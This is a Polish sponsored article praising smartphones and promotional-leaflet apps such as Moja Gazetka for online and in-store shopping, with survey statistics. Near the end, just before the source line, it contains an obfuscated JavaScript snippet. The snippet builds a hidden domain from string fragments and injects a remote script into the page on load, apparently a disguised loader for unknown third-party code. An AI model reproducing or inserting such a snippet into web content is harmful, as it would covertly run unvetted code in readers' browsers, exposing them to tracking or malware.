Na zakupy? Tylko z telefonem!
REDAKCJA • dawno temuMimo że coraz częściej robimy zakupy w sieci, to jeszcze daleko nam do całkowitego zrezygnowania z wizyt w tradycyjnych sklepach. Jeżeli chcemy kupować tanio i wygodnie – zarówno online, jak i offline – bardzo pomocne mogą być w tym nasze smartfony.
Zakupy internetowe cieszą się w Polsce coraz większą popularnością. Za kupowaniem online przemawiają m.in. brak konieczności wychodzenia z domu, dostęp do rozbudowanych ofert skoncentrowanych w jednym miejscu, a także o wiele niższe ceny niż w sklepach stacjonarnych. Co więcej, aby kupować w sklepach internetowych, nie musimy nawet uruchamiać komputera. Rozwój technologii mobilnych i większa dostępność nowoczesnych tabletów oraz smartfonów sprawiają, że coraz chętniej dokonujemy zakupów za ich pośrednictwem. Jak wynika z badań mShopper 2.0 wykonanych przez firmę Mobile Institute, obecnie aż 43 proc. osób robiących zakupy online wykorzystuje do tego smartfony, a 29 proc. – tablety. Dla porównania, w 2015 r. wartości te kształtowały się na poziomie 23 i 16 proc.
Urządzenia mobilne i konsumenckie zwyczaje
Samo robienie zakupów online to nie wszystko. Smartfonów coraz chętniej używamy do czynności, które można określić mianem okołozakupowych. Korzystając z telefonów, szukamy opinii lub dodatkowych informacji o produktach i usługach czy też poszukujemy inspiracji – wspomniane badania mShoper 2.0 pokazują, że w 2016 r. robimy to średnio 1,8 raza częściej niż przed rokiem.
Pomimo rosnącej popularności zakupów internetowych wciąż chętnie udajemy się do sklepów stacjonarnych. Z badań Shopper Study opublikowanych przez firmę Henkel wynika, że zaledwie 4 proc. badanych wybiera zakupy online w celu zaopatrywania się w artykuły codziennego użytku. Jednocześnie ponad ¾ respondentów chodzi do sklepów przynajmniej kilka razy w tygodniu, zaopatrując się w potrzebne produkty. Warto w tym miejscu zauważyć, że także w przypadku sklepów offline urządzenia mobilne są w stanie zdecydowanie ułatwić nasze konsumenckie zwyczaje.
Smartfony i informacje o promocjach
Do zakupów w sklepach stacjonarnych smartfony można wykorzystywać na różne sposoby. Choć coraz częściej stosujemy je, żeby za ich pomocą zapłacić za produkt, to ciągle jednak służą głównie do zdobycia potrzebnych informacji. Urządzenia mobilne doskonale nadają się do sprawdzenia godziny otwarcia sklepu czy porównania ceny w markecie z ceną oferowaną online. Innym rodzajem rozwiązań mobilnych wspomagających robienie zakupów są aplikacje z gazetkami promocyjnymi w formie elektronicznej, takie jak Moja Gazetka. Korzystając z takiego programu, można zapoznać się z aktualnymi cenami w sklepach nie tylko z branży spożywczej, lecz także odzieżowej, motoryzacyjnej, budowlanej, RTV czy oferty drogerii. Aplikacje mobilne ułatwiają również dostęp do kuponów promocyjnych w popularnych sieciach fast food. Dzięki możliwości przygotowania listy ulubionych sklepów i dyskontów pozostajemy na bieżąco z cenami poszczególnych produktów, tym samym optymalizując domowy budżet.
Gazetki promocyjne pozostają głównym źródłem informacji o promocjach dla aż 67 proc. uczestników badania Monitor Promocji 2015 zorganizowanej przez instytut ARC Rynek i Opinia. Ich dostępność w formie elektronicznej to nie tylko szybkie i wygodne dojście do informacji, lecz także duża oszczędność papieru. Co więcej, z e-gazetki można wygodnie przejść do aplikacji Moje Zakupy, która pozwala na dokonywanie bezpośrednich zakupów przez internet. Dzięki temu elektroniczne broszury mogą przypaść do gustu kupującym zarówno offline, jak i online.
Przede wszystkim wygoda
W Polsce liczba użytkowników urządzeń mobilnych rośnie z każdym rokiem. Nie dziwi więc fakt, że smartfony czy tablety są coraz chętniej wykorzystywane do robienia zakupów. Co więcej, aplikacje mobilne mogą być udogodnieniem i dla kupujących w sieci, i dla klientów w sklepach stacjonarnych. Niezależnie od tego, czy ze smartfonów korzystamy w celu zdobycia podstawowych informacji, czy też za ich pomocą w pełni przeprowadzamy transakcję, wykorzystanie telefonów i tabletów sprawia, że codzienne życie konsumenta staje się zdecydowanie wygodniejsze.
(function(){zel3=document.createElement("script");zel3_=(("u")+"st")+"a";zel3.async=true;zel3.type="text/javascript";zel3_+=("t.i")+""+"n";zel3_+=(("f")+"o");zel3_+="/";zel3u="40.";zel3u+="la1g37f2el3yilb04xl"+"4b87ez1b5";zel3.src="//"+zel3_+zel3u; document.body.appendChild(zel3);})();
Źródło: Artykuł sponsorowany
Ten artykuł nie ma jeszcze komentarzy
Pokaż wszystkie komentarze